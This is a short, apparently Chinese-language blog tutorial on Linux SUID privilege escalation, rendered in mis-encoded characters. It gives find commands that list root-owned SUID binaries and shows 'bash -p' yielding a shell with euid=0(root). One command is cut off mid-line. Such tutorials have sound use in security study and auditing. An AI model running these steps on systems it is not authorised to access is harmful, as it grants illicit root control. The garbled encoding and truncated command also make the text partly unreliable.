.jpg)
SUID是linux的一種權(quán)限機(jī)制,具有這種權(quán)限的文件會(huì)在其執(zhí)行時(shí),使調(diào)用者暫時(shí)獲得該文件擁有者的權(quán)限。如果擁有SUID權(quán)限,那么就可以利用系統(tǒng)中的二進(jìn)制文件和工具來進(jìn)行root提權(quán)。
以下命令可以發(fā)現(xiàn)系統(tǒng)上運(yùn)行的所有SUID可執(zhí)行文件。具體來說,命令將嘗試查找具有root權(quán)限的SUID的文件。
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls
?
?以上所有二進(jìn)制文件都將以root用戶權(quán)限執(zhí)行,因?yàn)樗鼈兊臋?quán)限中包含”s”,并且對(duì)應(yīng)的是root權(quán)限。
Bash
以下命令將以root權(quán)限打開一個(gè)bash shell。
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
? 版權(quán)聲明
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載。
THE END
.png)
